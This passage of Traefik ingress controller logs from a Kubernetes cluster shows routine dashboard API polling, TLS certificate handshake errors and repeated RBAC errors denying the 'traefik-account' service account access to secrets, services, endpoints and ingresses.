/api/overview HTTP/1.1" 200 496 "-" "-" 56 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:19:19 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 57 "api@internal" "-" 0ms +time="2024-03-30T07:19:22Z" level=debug msg="Serving default certificate for request: \"whoami.172.233.168.9.nip.io\"" +time="2024-03-30T07:19:22Z" level=debug msg="Serving default certificate for request: \"whoami.172.233.168.9.nip.io\"" +time="2024-03-30T07:19:22Z" level=debug msg="http: TLS handshake error from 10.2.0.129:30598: remote error: tls: unknown certificate" +time="2024-03-30T07:19:22Z" level=debug msg="http: TLS handshake error from 10.0.0.4:19281: remote error: tls: unknown certificate" +time="2024-03-30T07:19:22Z" level=debug msg="Serving default certificate for request: \"whoami.172.233.168.9.nip.io\"" +10.2.1.1 - - [30/Mar/2024:07:19:22 +0000] "GET / HTTP/2.0" 404 19 "-" "-" 58 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:19:23 +0000] "GET /favicon.ico HTTP/2.0" 404 19 "-" "-" 59 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:19:24 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 60 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:19:24 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 61 "api@internal" "-" 0ms +W0330 07:19:28.433382 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:19:28.433417 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:19:29 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 62 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:19:29 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 63 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:19:34 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 64 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:19:34 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 65 "api@internal" "-" 0ms +W0330 07:19:37.364826 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:19:37.364925 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:19:39 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 66 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:19:39 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 67 "api@internal" "-" 0ms +W0330 07:19:43.135816 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:19:43.135853 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:19:44 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 68 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:19:44 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 69 "api@internal" "-" 0ms +W0330 07:19:44.438267 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:19:44.438298 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:19:49 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 70 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:19:49 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 71 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:19:54 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 72 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:19:54 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 73 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:19:59 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 74 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:19:59 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 75 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:20:04 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 76 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:20:04 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 77 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:20:09 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 78 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:20:09 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 79 "api@internal" "-" 0ms +W0330 07:20:12.466628 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:20:12.466665 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:20:14 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 80 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:20:14 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 81 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:20:19 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 82 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:20:19 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 83 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:20:24 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 84 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:20:24 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 85 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:20:29 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 86 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:20:29 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 87 "api@internal" "-" 0ms +time="2024-03-30T07:20:33Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:07:20:33 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 88 "-" "-" 0ms +time="2024-03-30T07:20:33Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:07:20:34 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 89 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:20:34 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 90 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:20:34 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 91 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:20:34 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 92 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:20:34 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 93 "-" "-" 0ms +W0330 07:20:35.331436 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:20:35.331498 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:20:35.714846 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:20:35.714882 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 07:20:36.349446 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:20:36.349555 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:20:39 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 94 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:20:39 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 95 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:20:44 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 96 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:20:44 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 97 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:20:49 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 98 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:20:49 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 99 "api@internal" "-" 0ms +W0330 07:20:51.681048 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:20:51.681103 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:20:54 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 100 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:20:54 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 101 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:20:59 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 102 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:20:59 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 103 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:21:04 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 104 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:21:04 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 105 "api@internal" "-" 0ms +W0330 07:21:07.997817 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:21:07.997873 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:21:09 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 106 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:21:09 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 107 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:21:14 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 108 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:21:14 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 109 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:21:19 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 110 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:21:19 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 111 "api@internal" "-" 0ms +W0330 07:21:21.560970 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:21:21.561043 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:21:24 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 112 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:21:24 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 113 "api@internal" "-" 0ms +W0330 07:21:27.269947 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:21:27.269976 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:21:29 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 114 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:21:29 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 115 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:21:34 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 116 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:21:34 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 117 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:21:39 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 118 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:21:39 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 119 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:21:44 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 120 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:21:44 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 121 "api@internal" "-" 0ms +W0330 07:21:47.922383 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:21:47.922418 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:21:49 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 122 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:21:49 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 123 "api@internal" "-" 0ms +W0330 07:21:53.811778 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:21:53.811810 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:21:54 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 124 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:21:54 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 125 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:21:59 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 126 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:21:59 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 127 "api@internal" "-" 0ms +W0330 07:22:00.179930 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:22:00.180035 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:22:04 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 128 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:22:04 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 129 "api@internal" "-" 0ms +W0330 07:22:08.561168 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:22:08.561365 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:22:09 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 130 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:22:09 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 131 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:22:13 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 132 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:22:13 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 133 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:22:17 +0000] "GET /dashboard/js/12.92609e93.js HTTP/1.1" 200 1964 "-" "-" 134 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:22:17 +0000] "GET /api/http/services?search=&status=&per_page=10&page=1 HTTP/1.1" 200 262 "-" "-" 135 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:22:17 +0000] "GET /dashboard/providers/internal.svg HTTP/1.1" 200 3681 "-" "-" 136 "dashboard@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:22:18 +0000] "GET /api/http/services?search=&status=&per_page=10&page=2 HTTP/1.1" 400 53 "-" "-" 137 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:22:18 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 138 "api@internal" "-" 0ms +W0330 07:22:19.582073 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:22:19.582226 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:22:22 +0000] "GET /api/http/services?search=&status=&per_page=10&page=1 HTTP/1.1" 200 262 "-" "-" 139 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:22:23 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 140 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:22:23 +0000] "GET /api/http/routers?search=&status=&per_page=2&page=1 HTTP/1.1" 200 462 "-" "-" 141 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:22:23 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 142 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:22:24 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=2 HTTP/1.1" 400 53 "-" "-" 143 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:22:28 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 144 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:22:28 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 145 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:22:33 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 146 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:22:33 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 147 "api@internal" "-" 0ms +W0330 07:22:38.258995 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:22:38.259056 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:22:39 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 148 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:22:39 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 149 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:22:44 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 150 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:22:44 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 151 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:22:49 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 152 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:22:49 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 153 "api@internal" "-" 0ms +W0330 07:22:49.497884 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:22:49.497917 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:22:50.031575 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:22:50.031610 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:22:54 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 154 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:22:54 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 155 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:22:59 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 156 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:22:59 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 157 "api@internal" "-" 0ms +time="2024-03-30T07:23:01Z" level=debug msg="http: TLS handshake error from 10.2.0.129:60006: remote error: tls: unknown certificate" +time="2024-03-30T07:23:01Z" level=debug msg="Serving default certificate for request: \"whoami.172.233.168.9.nip.io\"" +10.0.0.4 - - [30/Mar/2024:07:23:01 +0000] "GET / HTTP/2.0" 404 19 "-" "-" 158 "-" "-" 0ms +W0330 07:23:01.612343 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:23:01.612526 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:23:04 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 159 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:23:04 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 160 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:23:09 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 161 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:23:09 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 162 "api@internal" "-" 0ms +W0330 07:23:13.854043 1 reflector.go:424] 